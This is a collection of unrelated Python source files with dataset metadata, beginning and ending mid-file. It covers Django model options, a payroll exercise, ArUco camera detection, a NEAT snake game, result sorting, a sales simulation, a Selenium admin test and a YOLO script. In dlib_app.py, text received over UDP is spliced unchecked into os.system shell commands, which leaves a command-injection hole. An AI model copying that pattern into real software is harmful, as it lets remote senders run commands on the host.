When\n 'direct' is False, 'field_object' is the corresponding RelatedObject\n for this field (since the field doesn't have an instance associated\n with it).\n\n Uses a cache internally, so after the first access, this is very fast.\n \"\"\"\n try:\n try:\n return self._name_map[name]\n except AttributeError:\n cache = self.init_name_map()\n return cache[name]\n\n except KeyError:\n raise FieldDoesNotExist(b'%s has no field named %r' % (\n self.object_name, name))\n\n def get_all_field_names(self):\n \"\"\"\n Returns a list of all field names that are possible for this model\n (including reverse relation names). This is used for pretty printing\n debugging output (a list of choices), so any internal-only field names\n are not included.\n \"\"\"\n try:\n cache = self._name_map\n except AttributeError:\n cache = self.init_name_map()\n\n names = sorted(cache.keys())\n return [ val for val in names if not val.endswith(b'+') ]\n\n def init_name_map(self):\n \"\"\"\n Initialises the field name -> field object mapping.\n \"\"\"\n cache = {}\n for f, model in self.get_all_related_m2m_objects_with_model():\n cache[f.field.related_query_name()] = (\n f, model, False, True)\n\n for f, model in self.get_all_related_objects_with_model():\n cache[f.field.related_query_name()] = (\n f, model, False, False)\n\n for f, model in self.get_m2m_with_model():\n cache[f.name] = (\n f, model, True, True)\n\n for f, model in self.get_fields_with_model():\n cache[f.name] = (\n f, model, True, False)\n\n if app_cache_ready():\n self._name_map = cache\n return cache\n\n def get_add_permission(self):\n return b'add_%s' % self.object_name.lower()\n\n def get_change_permission(self):\n return b'change_%s' % self.object_name.lower()\n\n def get_delete_permission(self):\n return b'delete_%s' % self.object_name.lower()\n\n def get_all_related_objects(self, local_only=False, include_hidden=False, include_proxy_eq=False):\n return [ k for k, v in self.get_all_related_objects_with_model(local_only=local_only, include_hidden=include_hidden, include_proxy_eq=include_proxy_eq)\n ]\n\n def get_all_related_objects_with_model(self, local_only=False, include_hidden=False, include_proxy_eq=False):\n \"\"\"\n Returns a list of (related-object, model) pairs. 
Similar to\n get_fields_with_model().\n \"\"\"\n try:\n self._related_objects_cache\n except AttributeError:\n self._fill_related_objects_cache()\n\n predicates = []\n if local_only:\n predicates.append(lambda k, v: not v)\n if not include_hidden:\n predicates.append(lambda k, v: not k.field.rel.is_hidden())\n cache = self._related_objects_proxy_cache if include_proxy_eq else self._related_objects_cache\n return [ t for t in cache.items() if all(p(*t) for p in predicates) ]\n\n def _fill_related_objects_cache(self):\n cache = SortedDict()\n parent_list = self.get_parent_list()\n for parent in self.parents:\n for obj, model in parent._meta.get_all_related_objects_with_model(include_hidden=True):\n if (obj.field.creation_counter < 0 or obj.field.rel.parent_link) and obj.model not in parent_list:\n continue\n if not model:\n cache[obj] = parent\n else:\n cache[obj] = model\n\n proxy_cache = cache.copy()\n for klass in get_models(include_auto_created=True, only_installed=False):\n if not klass._meta.swapped:\n for f in klass._meta.local_fields:\n if f.rel and not isinstance(f.rel.to, six.string_types):\n if self == f.rel.to._meta:\n cache[RelatedObject(f.rel.to, klass, f)] = None\n proxy_cache[RelatedObject(f.rel.to, klass, f)] = None\n elif self.concrete_model == f.rel.to._meta.concrete_model:\n proxy_cache[RelatedObject(f.rel.to, klass, f)] = None\n\n self._related_objects_cache = cache\n self._related_objects_proxy_cache = proxy_cache\n return\n\n def get_all_related_many_to_many_objects(self, local_only=False):\n try:\n cache = self._related_many_to_many_cache\n except AttributeError:\n cache = self._fill_related_many_to_many_cache()\n\n if local_only:\n return [ k for k, v in cache.items() if not v ]\n return list(cache)\n\n def get_all_related_m2m_objects_with_model(self):\n \"\"\"\n Returns a list of (related-m2m-object, model) pairs. Similar to\n get_fields_with_model().\n \"\"\"\n try:\n cache = self._related_many_to_many_cache\n except AttributeError:\n cache = self._fill_related_many_to_many_cache()\n\n return list(six.iteritems(cache))\n\n def _fill_related_many_to_many_cache(self):\n cache = SortedDict()\n parent_list = self.get_parent_list()\n for parent in self.parents:\n for obj, model in parent._meta.get_all_related_m2m_objects_with_model():\n if obj.field.creation_counter < 0 and obj.model not in parent_list:\n continue\n if not model:\n cache[obj] = parent\n else:\n cache[obj] = model\n\n for klass in get_models(only_installed=False):\n if not klass._meta.swapped:\n for f in klass._meta.local_many_to_many:\n if f.rel and not isinstance(f.rel.to, six.string_types) and self == f.rel.to._meta:\n cache[RelatedObject(f.rel.to, klass, f)] = None\n\n if app_cache_ready():\n self._related_many_to_many_cache = cache\n return cache\n\n def get_base_chain(self, model):\n \"\"\"\n Returns a list of parent classes leading to 'model' (order from closet\n to most distant ancestor). This has to handle the case were 'model' is\n a granparent or even more distant relation.\n \"\"\"\n if not self.parents:\n return\n if model in self.parents:\n return [model]\n for parent in self.parents:\n res = parent._meta.get_base_chain(model)\n if res:\n res.insert(0, parent)\n return res\n\n raise TypeError(b'%r is not an ancestor of this model' % model._meta.module_name)\n\n def get_parent_list(self):\n \"\"\"\n Returns a list of all the ancestor of this model as a list. 
Useful for\n determining if something is an ancestor, regardless of lineage.\n \"\"\"\n result = set()\n for parent in self.parents:\n result.add(parent)\n result.update(parent._meta.get_parent_list())\n\n return result\n\n def get_ancestor_link(self, ancestor):\n \"\"\"\n Returns the field on the current model which points to the given\n \"ancestor\". This is possible an indirect link (a pointer to a parent\n model, which points, eventually, to the ancestor). Used when\n constructing table joins for model inheritance.\n\n Returns None if the model isn't an ancestor of this one.\n \"\"\"\n if ancestor in self.parents:\n return self.parents[ancestor]\n for parent in self.parents:\n parent_link = parent._meta.get_ancestor_link(ancestor)\n if parent_link:\n return self.parents[parent] or parent_link\n\n def get_ordered_objects(self):\n \"\"\"Returns a list of Options objects that are ordered with respect to this object.\"\"\"\n if not hasattr(self, b'_ordered_objects'):\n objects = []\n self._ordered_objects = objects\n return self._ordered_objects","sub_path":"pycfiles/ka_lite_static-0.17.5-py2-none-any/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":19606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
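`add_field` above keeps `local_fields` sorted by inserting each field at the position `bisect` returns, relying on fields comparing by `creation_counter`. A standalone sketch of the pattern with a minimal stand-in `Field`:

```python
from bisect import bisect
import functools

@functools.total_ordering
class Field:
    """Minimal stand-in for Django's Field: ordered by declaration order."""
    counter = 0

    def __init__(self, name):
        self.name = name
        self.creation_counter = Field.counter
        Field.counter += 1

    def __eq__(self, other):
        return self.creation_counter == other.creation_counter

    def __lt__(self, other):
        return self.creation_counter < other.creation_counter

fields = []
for f in (Field("id"), Field("name"), Field("email")):
    # bisect finds the insertion point that keeps the list sorted, so
    # fields stays ordered by creation_counter at all times.
    fields.insert(bisect(fields, f), f)
print([f.name for f in fields])  # ['id', 'name', 'email']
```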
+{"seq_id":"100840928","text":"import os\nimport sys\nimport socket\nfrom config import *\n\nserverSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nserverSock.bind((\"csml-dlib\", apps[\"dlib\"]))\n\ndef main():\n # (simplest) CMD_LINE Format\n # app:container_id:simple_request\n while True:\n\n CMD_LINE, SOURCE_ADDR = serverSock.recvfrom(1024)\n CMD_LINE = CMD_LINE.decode('utf-8')\n container_id = CMD_LINE.split(\":\")[1] # type:str\n simple_request = CMD_LINE.split(\":\")[2] # type:str 'Y' or 'N'\n\n # Ready to process, change the status to [pending]\n # If first use, ignore the error anyway, no harm\n EXE_LINE = \"mv /results/opencv/\" + str(container_id) + \".log /results/dlib/[pending]\" + str(container_id) + \".log\"\n os.system(EXE_LINE)\n\n if simple_request == 'Y':\n EXE_LINE = \"/dlib-19.18/examples/build/svm_ex\"\n EXE_LINE += \" | ts '[%Y-%m-%d %H:%M:%S]'\"\n EXE_LINE += \" | tee -a /results/dlib/[pending]\" # -a for appending\n EXE_LINE += str(container_id) + \".log\" # One user one .log file\n os.system(EXE_LINE)\n\n # Remove the [pending] status\n EXE_LINE = \"mv /results/dlib/[pending]\" + str(container_id) + \".log /results/dlib/\" + str(container_id) + \".log\"\n os.system(EXE_LINE)\n\nif __name__ == \"__main__\":\n main()","sub_path":"code/app/dlib_app.py","file_name":"dlib_app.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
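The dispatcher above expects colon-separated datagrams of the form app:container_id:simple_request. A minimal client sketch; the hostname matches the bind call above, but the port is a placeholder because the apps mapping lives in the unshown config module:

import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# 'dlib:42:Y' asks the dlib app to run the simple request for container 42.
sock.sendto(b'dlib:42:Y', ('csml-dlib', 9000))  # 9000 is a placeholder port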
+{"seq_id":"488705537","text":"# Classes ==================================================================\n \nclass Programmer:\n \n # Add the class attributes\n salary = 30000\n monthly_bonus = 500\n \n def __init__(self, name, age, address, phone, programming_languages):\n self.name = name\n self.age = age\n self.address = address\n self.phone = phone\n self.programming_languages = programming_languages\n \nclass Assistant:\n \n # Add the class attributes\n salary = 20000\n monthly_bonus = 500\n \n def __init__(self, name, age, address, phone, bilingual):\n self.name = name\n self.age = age\n self.address = address\n self.phone = phone\n self.bilingual = bilingual\n \n# Program ==================================================================\n \n# Function that prints the monthly salary of each worker\n# and the total amount that the startup owner has to pay per month\ndef calculate_payroll(employees):\n \n total = 0\n \n print(\"\\n========= Welcome to our Payroll System =========\\n\")\n \n # Iterate over the list of instances to calculate\n # and display the monthly salary of each employee,\n # and add the monthly salary to the total for this month\n for employee in employees:\n salary = round(employee.salary / 12, 2) + employee.monthly_bonus\n print(employee.name.capitalize() + \"'s salary is: $\" + str(salary))\n total += salary\n \n # Display the total \n print(\"\\nThe total payroll this month will be: $\", total)\n \n# Instances (employees)\njack = Programmer(\"Jack\", 45, \"5th Avenue\", \"555-563-345\", [\"Python\", \"Java\"])\nisabel = Programmer(\"Isabel\", 25, \"6th Avenue\", \"234-245-853\", [\"JavaScript\"])\nnora = Assistant(\"Nora\", 23, \"7th Avenue\", \"562-577-333\", True)\n \n# List of instances\nemployees = [jack, isabel, nora]\n \n# Function call - Passing the list of instances as argument\ncalculate_payroll(employees)\n","sub_path":"payroll (mini project)/payroll.py","file_name":"payroll.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
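salary and monthly_bonus above are class attributes, so they are shared by every Programmer (or Assistant) instance until an instance assigns its own value. A quick illustration of that lookup rule, using a hypothetical minimal class:

class Worker:
    salary = 30000

a, b = Worker(), Worker()
Worker.salary = 36000      # rebinding on the class is seen by all instances
print(a.salary, b.salary)  # 36000 36000
b.salary = 40000           # instance assignment shadows the class attribute
print(a.salary, b.salary)  # 36000 40000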
+{"seq_id":"426019411","text":"'''\n* Team ID : 117\n* Author List : Ebey Abraham, Akshatha Nayak, Anandhu Udayakumar\n* Filename : picam.py\n* Theme : Antbot\n* Functions : detectAruco(img), markAruco(img,aruco_list), getArucoID(), getColor()\n* Global Variables : NONE\n'''\nfrom imutils.video.videostream import VideoStream\nimport imutils\nimport cv2\nimport cv2.aruco as aruco\nimport numpy as np\nimport time\nimport csv\nimport pandas as pd\n\nclass Camera:\n def __init__(self):\n self.IDs = []\n #range for red color\n self.lower_red = np.array([160,100,0])\n self.upper_red = np.array([180,255,255])\n #range for blue color\n self.lower_blue = np.array([100,100,0])\n self.upper_blue = np.array([140,255,255])\n #range for green color\n self.lower_green = np.array([40,100,0])\n self.upper_green = np.array([80,255,255])\n #range for yellow color\n self.lower_yellow = np.array([10,100,100])\n self.upper_yellow = np.array([30,255,255])\n\n '''\n * Function Name : detectAruco\n * Input : img-> image to detect aruco marker from\n * Output : returns the detected aruco id and its corner as a dictionary\n * Logic : check that the image frame has only one aruco marker and return the id and corner list as a key value pair\n * Example Call : detectAruco(img)\n '''\n def detectAruco(self,img):\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n #create aruco dictionary of 7x7 bits and 1000 combinations\n aruco_dict = aruco.Dictionary_get(aruco.DICT_7X7_1000)\n parameters = aruco.DetectorParameters_create()\n #list of corners and ids\n corners, ids, _ = aruco.detectMarkers(gray,aruco_dict,parameters = parameters)\n aruco_list = {} #stores pairs of aruco id and corresponding corners\n #check that only one aruco marker is there and return the aruco id\n if len(corners) == 1:\n aruco_list[ids[0][0]] = corners[0][0]\n return aruco_list\n\n '''\n * Function Name : markAruco\n * Input : img-> image to detect aruco marker from\n aruco_list -> dictionary of aruco corners indexed by the aruco ID\n * Output : returns the image with the marked corners\n * Logic : find the center of the aruco marker by finding the mean and mark the center and the corners\n * Example Call : markAruco(img,aruco_list)\n '''\n def markAruco(self,img,aruco_list):\n ids = aruco_list.keys()\n font = cv2.FONT_HERSHEY_SIMPLEX\n for id in ids:\n corners = aruco_list[id]\n center = corners[0] + corners[1] + corners[2] + corners[3]\n center[:] = [int(x/4) for x in center]\n center = tuple(center)\n #marking the points\n cv2.circle(img,center,1,(0,0,255),8)\n cv2.circle(img,tuple(corners[0]),1,(0,0,255),8)\n cv2.circle(img,tuple(corners[1]),1,(0,255,0),8)\n cv2.circle(img,tuple(corners[2]),1,(255,0,0),8)\n return img\n\n '''\n * Function Name : getArucoID\n * Input : NONE\n * Output : prints the four detected aruco IDs (no return value)\n * Logic : loop over the camera feed until four distinct aruco markers have been detected by detectAruco\n * Example Call : getArucoID()\n '''\n def getArucoID(self):\n vs = VideoStream(usePiCamera = True).start()\n time.sleep(0.5)\n ids = []\n while len(ids) < 4:\n ID = 0 #stores the detected ID\n frame = vs.read()\n aruco_list = self.detectAruco(frame)\n if len(aruco_list):\n ID = list(aruco_list.keys())\n ID = ID[0]\n #check that the detected ID is not repeated and add to the list of ids\n if ID > 0 and ID not in ids:\n ids.append(ID)\n #self.IDs.append(bin(ID)[2:]) #store ID in binary format\n print(\"ID Detected: {}\".format(ID))\n vs.stop()\n\n def getColor(self):\n vs = VideoStream(usePiCamera = True).start()\n 
time.sleep(0.5)\n count = 3\n colors = {'r':0,'b':0,'g':0,'y':0}\n while count:\n count -= 1\n frame = vs.read()\n hsv = cv2.cvtColor(frame,cv2.COLOR_BGR2HSV)\n mask_red = cv2.inRange(hsv,self.lower_red,self.upper_red)\n mask_blue = cv2.inRange(hsv,self.lower_blue,self.upper_blue)\n mask_green = cv2.inRange(hsv,self.lower_green,self.upper_green)\n mask_yellow = cv2.inRange(hsv,self.lower_yellow,self.upper_yellow)\n\n colors['r'] = cv2.countNonZero(mask_red)\n colors['b'] = cv2.countNonZero(mask_blue)\n colors['g'] = cv2.countNonZero(mask_green)\n colors['y'] = cv2.countNonZero(mask_yellow)\n\n #res = cv2.bitwise_and(frame,frame,mask = mask_yellow)\n #cv2.imshow(\"Res\",res)\n #cv2.waitKey(10)\n vs.stop()\n print(colors)\n for color in colors:\n if colors[color] > 5000:\n return color\n return 'x'\n\n\nif __name__ == \"__main__\":\n cam = Camera()\n res = cam.getColor()\n print(res)\n","sub_path":"utils/picam.py","file_name":"picam.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
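getColor decides a color by counting how many HSV pixels fall inside each band. The same inRange/countNonZero logic can be sanity-checked on a synthetic frame; a sketch, assuming OpenCV and NumPy are installed, with the blue bounds copied from the class above:

import cv2
import numpy as np

img = np.zeros((10, 10, 3), dtype=np.uint8)
img[:, :] = (255, 0, 0)  # pure blue in BGR
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(hsv, np.array([100, 100, 0]), np.array([140, 255, 255]))
print(cv2.countNonZero(mask))  # 100: every pixel lands in the blue band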
+{"seq_id":"181941212","text":"import time\n\nfrom django.test import TestCase, override_settings\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom webdriver_manager.chrome import ChromeDriverManager\n\nfrom .utils import element_has_css_class\n\nimport os\nos.environ['WDM_LOG_LEVEL'] = '0'\n\nclass TestBatonIndex(TestCase):\n def setUp(self):\n service = Service(ChromeDriverManager(version='114.0.5735.90').install())\n chrome_options = Options()\n chrome_options.add_argument(\"--headless\")\n chrome_options.add_argument('--no-sandbox')\n chrome_options.add_argument('--disable-extensions')\n chrome_options.add_argument('--disable-dev-shm-usage')\n self.driver = webdriver.Chrome(\n service=service,\n options=chrome_options,\n )\n self.driver.set_window_size(1920, 1080)\n self.driver.implicitly_wait(10)\n self.login()\n\n def tearDown(self):\n self.driver.quit()\n\n def login(self):\n self.driver.get('http://localhost:8000/admin')\n username_field = self.driver.find_element(By.ID, \"id_username\")\n password_field = self.driver.find_element(By.ID, \"id_password\")\n button = self.driver.find_element(By.CSS_SELECTOR, 'input[type=submit]')\n\n username_field.send_keys('admin')\n time.sleep(1)\n password_field.send_keys('admin')\n time.sleep(1)\n button.click()\n\n def test_force_theme(self):\n # Wait until baton is ready\n wait = WebDriverWait(self.driver, 10)\n wait.until(element_has_css_class((By.TAG_NAME, 'body'), \"baton-ready\"))\n\n # site title\n html = self.driver.find_element(By.CSS_SELECTOR, \"html\")\n self.assertEqual(\n html.get_attribute('data-bs-theme'), 'light')\n","sub_path":"testapp/app/app/tests/test_e2e_theme.py","file_name":"test_e2e_theme.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
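element_has_css_class is imported from a local utils module that is not shown here. A typical implementation of such a custom expected condition, following the pattern from the Selenium documentation (an assumption about the helper, not its actual source):

class element_has_css_class:
    # Wait condition: the located element carries the given CSS class.
    def __init__(self, locator, css_class):
        self.locator = locator
        self.css_class = css_class

    def __call__(self, driver):
        element = driver.find_element(*self.locator)
        return element if self.css_class in element.get_attribute('class') else False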
+{"seq_id":"474173512","text":"import pygame\nimport time\nimport random\nimport neat\nimport os\nimport math\n \npygame.init()\n \nwhite = (255, 255, 255)\nyellow = (255, 255, 102)\nblack = (0, 0, 0)\nred = (213, 50, 80)\ngreen = (0, 255, 0)\nblue = (50, 153, 213)\n \ndis_width = 230\ndis_height = 230\n \nbestscore1 = 0\n\ndis = pygame.display.set_mode((dis_width, dis_height))\npygame.display.set_caption('Snake Game by Taren P')\n \nclock = pygame.time.Clock()\n \nsnake_block = 10\nsnake_speed = 150\n \napple = pygame.image.load(os.path.join(\"Graphics\", \"apple.png\"))\napple = pygame.transform.scale(apple, (20, 20))\nfont_style = pygame.font.SysFont(\"bahnschrift\", 15)\nscore_font = pygame.font.SysFont(\"comicsansms\", 20)\n \ndef remove(index):\n snakes.pop(index)\n ge.pop(index)\n nets.pop(index)\n\ndef Your_score(score, y):\n global bestscore1\n text_1 = font_style.render(f'Snakes Alive: {str(len(snakes))}', True, white)\n dis.blit(text_1, [100, 210])\n value = score_font.render(\"Your Score: \" + str(score), True, yellow)\n dis.blit(value, [0, 0])\n if bestscore1 < score:\n bestscore1 = score\n value3 = font_style.render(f'Generation: {pop.generation+1}', True, white)\n dis.blit(value3, [0, 190])\n value2 = font_style.render(\"Best Score: \" + str(bestscore1), True, white)\n dis.blit(value2, [0, 210])\n\ndef find(lst, r):\n return [i for i, x in enumerate(lst) if x == r]\n \n \ndef our_snake(snake_block, snake_list):\n for x in snake_list:\n pygame.draw.rect(dis, green, [x[0], x[1], snake_block, snake_block])\n \ndef distance(pos_a, pos_b):\n dx = pos_a[0]-pos_b[0]\n dy = pos_a[1]-pos_b[1]\n return math.sqrt(dx**2+dy**2)\n\ndef truncate(n, decimals=0):\n multiplier = 10 ** decimals\n return int(n * multiplier) / multiplier\n\nscore = 0\ndef gameLoop(genomes, config, i, y):\n game_over = False\n game_close = False\n global score\n x1 = (dis_width / 2) + 5\n y1 = (dis_height / 2) + 5\n \n x1_change = 0\n y1_change = 0\n location = []\n amount = []\n counter = 0\n\n snake_List = []\n Length_of_snake = 3\n score = 0\n #x1_change = -snake_block\n foodx = round(random.randrange(0, dis_width - snake_block) / 10.0) * 10.0\n foody = round(random.randrange(0, dis_height - snake_block) / 10.0) * 10.0\n\n while not game_over:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n game_over = True\n if x1 >= dis_width or x1 < 0 or y1 >= dis_height or y1 < 0:\n ge[i].fitness -= 10\n game_close = True\n x1 += x1_change\n y1 += y1_change\n dis.fill(blue)\n l = 0\n if foody == (dis_width/2) + 5:\n foody = round(random.randrange(0, dis_height - snake_block) / 10.0) * 10.0\n if foodx == (dis_height/2) + 5:\n foodx = round(random.randrange(0, dis_height - snake_block) / 10.0) * 10.0\n while l <= dis_width/10:\n pygame.draw.line(dis, black, (0, (dis_height / 23)*l), (dis_width, (dis_height / 23)*l))\n pygame.draw.line(dis, black, ((dis_width / 23)*l, 0), ((dis_width / 23)*l, dis_height))\n l+=1\n pygame.draw.rect(dis, red, [foodx, foody, snake_block, snake_block])\n dis.blit(apple, (foodx-5, foody -5.7))\n snake_Head = []\n snake_Head.append(x1)\n snake_Head.append(y1)\n snake_List.append(snake_Head)\n if len(snake_List) > Length_of_snake:\n del snake_List[0]\n \n for x in snake_List[:-1]:\n if x == snake_Head:\n ge[i].fitness -= 10\n game_close = True\n output = nets[i].activate((distance((x1, y1), (foodx, foody)), Length_of_snake, x1, y1, dis_width, foodx, foody))\n if output[0] > 0.5:\n x1_change = -snake_block\n y1_change = 0\n if output[1] > 0.5:\n x1_change = snake_block\n 
y1_change = 0\n if output[2] > 0.5:\n y1_change = -snake_block\n x1_change = 0\n if output[3] > 0.5:\n y1_change = snake_block\n x1_change = 0\n location.append(distance((x1, y1), (foodx, foody)))\n if len(location) > 100:\n del location[0]\n for r in location:\n amount = find(location, r)\n if len(amount) > 2:\n ge[i].fitness -= 10\n game_close = True\n our_snake(snake_block, snake_List)\n Your_score(Length_of_snake - 3, y)\n pygame.display.update()\n if x1 == foodx and y1 == foody:\n foodx = round(random.randrange(0, dis_width - snake_block) / 10.0) * 10.0\n foody = round(random.randrange(0, dis_height - snake_block) / 10.0) * 10.0\n Length_of_snake += 1\n if counter > 12:\n ge[i].fitness += 0.3\n clock.tick(snake_speed)\n if game_close == True:\n score = Length_of_snake -3\n ge[i].fitness += score*20\n # print(ge[i].fitness)\n remove(i)\n break\n \ndef eval_genomes(genomes, config):\n global snakes, ge, nets, i\n snakes = []\n ge = []\n nets = []\n y = 0\n for genome_id, genome in genomes:\n snakes.append(\"snake\")\n ge.append(genome)\n net = neat.nn.FeedForwardNetwork.create(genome, config)\n nets.append(net)\n genome.fitness = 0\n while y<= 10000000:\n for i, snake in enumerate(snakes):\n gameLoop(genomes, config, i, y)\n y += 1\n\ndef run(config_path):\n global pop\n config = neat.config.Config(\n neat.DefaultGenome,\n neat.DefaultReproduction,\n neat.DefaultSpeciesSet,\n neat.DefaultStagnation,\n config_path\n )\n\n pop = neat.Population(config)\n pop.run(eval_genomes, 10000000000)\n\n\nif __name__ == '__main__':\n local_dir = os.path.dirname(__file__)\n config_path = os.path.join(local_dir, 'config.txt')\n run(config_path)","sub_path":"Snake.py","file_name":"Snake.py","file_ext":"py","file_size_in_byte":6093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
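Because the four network outputs are thresholded independently, two values above 0.5 let the later if branches win arbitrarily; selecting the single strongest output removes that ambiguity. A sketch of the alternative (choose_direction is a hypothetical helper, not part of the original script):

def choose_direction(outputs, block=10):
    # Map the 4 network outputs to one (dx, dy) step: left, right, up, down.
    moves = [(-block, 0), (block, 0), (0, -block), (0, block)]
    return moves[max(range(4), key=lambda k: outputs[k])]

print(choose_direction([0.7, 0.9, 0.1, 0.6]))  # (10, 0): 'right' wins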
+{"seq_id":"164681903","text":"from operator import itemgetter\nimport pandas as pd\n\nfor idx in range(100):\n path = \"result/set2/scores/rwr_result_set2_\" + str(idx) + \".txt\"\n # Input files are whitespace-separated; delim_whitespace expects a bool, not \"\".\n data = pd.read_csv(path, delim_whitespace=True, header=None)\n rows = []\n col1 = data[0]\n col2 = data[1]\n col3 = data[2]\n\n for i in range(len(data[0])):\n rows.append((col1[i], col2[i], col3[i]))\n # Sort by the score in the second column, highest first.\n rows_sorted = sorted(rows, key=itemgetter(1), reverse=True)\n\n # Rewrite the same file, comma-separated and sorted by score.\n with open(path, \"w\") as fp:\n for row in rows_sorted:\n fp.write(str(row[0]) + \",\" + str(row[1]) + \",\" + str(row[2]) + \"\\n\")\n","sub_path":"prioritization_methods/rwr/randomize2/sort_res.py","file_name":"sort_res.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
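The tuple-building and manual rewrite above can also be collapsed into pandas calls; an equivalent sketch operating on the same path variable:

import pandas as pd

df = pd.read_csv(path, delim_whitespace=True, header=None)
df = df.sort_values(by=1, ascending=False)  # sort by the score column, descending
df.to_csv(path, header=False, index=False)  # comma-separated, like the loop above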
+{"seq_id":"437234155","text":"from Resultado import Resultado\nfrom Simulacion import Simulacion\nimport Operaciones\nimport os\n\nmayoresGanancias = []\n\n\n# Runs the requested number of simulations, each covering 30 months and the\n# whole range of initial magazine counts, and records each run's best profit.\ndef CalculoSimulacion(rangoIni, rangoFinal, iteraciones):\n for i in range(1,iteraciones+1):\n simulacion = Simulacion(i)\n for mes in range(1,31):\n for revista in range(rangoIni, rangoFinal+1):\n resultado = Resultado(mes, revista)\n simulacion.AgregarResultado(resultado)\n\n simulacion.Imprimir()\n mayoresGanancias.append(simulacion.Get_GananciaMayor())\n\n Operaciones.ImprimirGanancias(mayoresGanancias)\n \ndef IniciarPrograma():\n try:\n print('Simulation of the second policy, from an initial number of magazines x up to y: \n')\n iteraciones = int(input('Enter the number of simulations to run:'))\n revistaInicial = int(input('Enter the minimum initial number of magazines:'))\n revistaFinal = int(input('Enter the maximum initial number of magazines:'))\n\n if revistaFinal < revistaInicial:\n print('Enter a valid range.')\n else:\n CalculoSimulacion(revistaInicial, revistaFinal, iteraciones)\n except Exception as e: \n print(\"An error occurred, please try again\")\n print(\"Error detail:\", e)\n\n# Clear any Excel output from previous runs before starting.\nerror = False\nfolder = 'output/'\nfor the_file in os.listdir(folder):\n file_path = os.path.join(folder, the_file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n except Exception:\n if error is False:\n print(\"The program could not delete all the Excel files; please close them and try again.\")\n error = True\n\nif error is False:\n IniciarPrograma()\n\n\n\n","sub_path":"politicaUno/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
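The cleanup loop above only removes flat files from output/. A compact pathlib equivalent (a sketch with the same behaviour):

from pathlib import Path

for f in Path('output/').iterdir():
    if f.is_file():
        try:
            f.unlink()
        except OSError:
            print('Could not delete', f)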
+{"seq_id":"341797997","text":"import cv2 as cv\nimport numpy as np\nimport random as rng\nimport darknet\nimport os\n\nrng.seed(12345)\n\nvideoPath = \"VID.mp4\"\nconfigPath = \"YOLOv3/yolov3.cfg\"\nweightPath = \"YOLOv3/yolov3.weights\"\n# configPath = \"YOLOv3/yolov3-tiny.cfg\"\n# weightPath = \"YOLOv3/yolov3-tiny.weights\"\nclassesPath = \"YOLOv3/coco.names\"\n\nif not os.path.exists(videoPath):\n raise ValueError(\"Invalid video path `\" + os.path.abspath(videoPath) + \"`\")\nif not os.path.exists(configPath):\n raise ValueError(\"Invalid config path `\" + os.path.abspath(configPath) + \"`\")\nif not os.path.exists(weightPath):\n raise ValueError(\"Invalid weight path `\" + os.path.abspath(weightPath) + \"`\")\nif not os.path.exists(classesPath):\n raise ValueError(\"Invalid classes path `\" + os.path.abspath(classesPath) + \"`\")\n\nwith open(classesPath, 'rt') as f:\n classes = f.read().rstrip('\\n').split('\\n')\n\nconfThreshold = 0.5\nnmsThreshold = 0.4\ninpWidth = 320\ninpHeight = 320\n\nnet = cv.dnn.readNetFromDarknet(configPath, weightPath)\nnet.setPreferableBackend(cv.dnn.DNN_BACKEND_OPENCV)\nnet.setPreferableTarget(cv.dnn.DNN_TARGET_CPU)\n# Get the names of the network's output layers\ndef getOutputsNames(net):\n layersNames = net.getLayerNames()\n return [layersNames[i[0] - 1] for i in net.getUnconnectedOutLayers()]\n\n# Return the label of the bounding box with the highest confidence\n# (this function is no longer used)\ndef process(outs):\n classIds = []\n confidences = []\n boxes = []\n for out in outs:\n for detection in out:\n scores = detection[5:]\n classId = np.argmax(scores)\n confidence = scores[classId]\n if confidence > confThreshold:\n classIds.append(classId)\n confidences.append(float(confidence))\n \n if len(classIds) != 0:\n index = np.argsort(confidences)[-1]\n classId = classIds[index]\n # print(classes[classId], f'{confidences[index]:.2f}')\n label = f'{classes[classId]} {confidences[index]:.2f}'\n return label\n return None\n\ndef postProcess(roi, outs):\n height, width, channel = roi.shape\n classIds = []\n confidences = []\n boxes = []\n for out in outs:\n for detection in out:\n scores = detection[5:]\n classId = np.argmax(scores)\n confidence = scores[classId]\n if confidence > confThreshold:\n center_x = (int)(detection[0] * width)\n center_y = (int)(detection[1] * height)\n box_width = (int)(detection[2] * width)\n box_height = (int)(detection[3] * height)\n left = (int)(center_x - box_width / 2)\n top = (int)(center_y - box_height / 2)\n classIds.append(classId)\n confidences.append((float)(confidence))\n boxes.append([left, top, box_width, box_height])\n box_result = []\n conf_result = []\n class_result = []\n index = cv.dnn.NMSBoxes(boxes, confidences, confThreshold, nmsThreshold)\n for i in index:\n i = i[0]\n box_result.append(boxes[i])\n conf_result.append(confidences[i])\n class_result.append(classes[classIds[i]])\n \n print(class_result)\n return box_result, conf_result, class_result\n\ndef transform(box, roi_x, roi_y):\n for b in box:\n b[0] += roi_x\n b[1] += roi_y\n\n\nsurf = cv.xfeatures2d.SURF_create(1000)\n# surf = cv.xfeatures2d.SURF_create()\nFLANN_INDEX_KDTREE = 1\nMIN_MATCH_COUNT = 10\nindex_params = dict(algorithm = 